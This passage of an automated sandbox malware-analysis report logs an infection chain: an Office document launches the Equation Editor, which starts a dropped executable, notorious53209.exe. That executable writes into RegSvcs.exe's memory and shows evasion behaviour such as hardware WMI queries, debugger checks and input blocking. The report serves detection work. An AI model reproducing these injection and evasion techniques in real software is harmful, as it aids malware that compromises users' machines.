                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeAPI/Special instruction interceptor: Address: 163224
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 9633Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_10-99459
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeAPI coverage: 4.7 %
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3424Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00294696 GetFileAttributesW,FindFirstFileW,FindClose,10_2_00294696
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0029C93C FindFirstFileW,FindClose,10_2_0029C93C
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0029C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0029C9C7
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0029F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0029F200
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0029F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0029F35D
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0029F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0029F65E
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00293A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00293A2B
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00293D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00293D4E
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0029BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0029BF27
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00234AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00234AFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeAPI call chain: ExitProcess graph end nodegraph_10-99821
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeAPI call chain: ExitProcess graph end nodegraph_10-98163
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeAPI call chain: ExitProcess graph end nodegraph_10-99058
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_01E440F9 LdrInitializeThunk,12_2_01E440F9
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002A41FD BlockInput,10_2_002A41FD
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00233B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00233B4C
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00265CCC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,10_2_00265CCC
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0034F090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,10_2_0034F090
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00163490 mov eax, dword ptr fs:[00000030h]10_2_00163490
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_001634F0 mov eax, dword ptr fs:[00000030h]10_2_001634F0
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00161E70 mov eax, dword ptr fs:[00000030h]10_2_00161E70
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002881F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_002881F7
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0025A364 SetUnhandledExceptionFilter,10_2_0025A364
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0025A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0025A395
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00288C93 LogonUserW,10_2_00288C93
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00233B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00233B4C
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00234A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00234A35
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00294EF5 mouse_event,10_2_00294EF5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\notorious53209.exe "C:\Users\user\AppData\Roaming\notorious53209.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\notorious53209.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002881F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_002881F7
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00294C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00294C03
                  Source: notorious53209.exe, 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: notorious53209.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0025886B cpuid 10_2_0025886B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002650D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,10_2_002650D7
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00272230 GetUserNameW,10_2_00272230
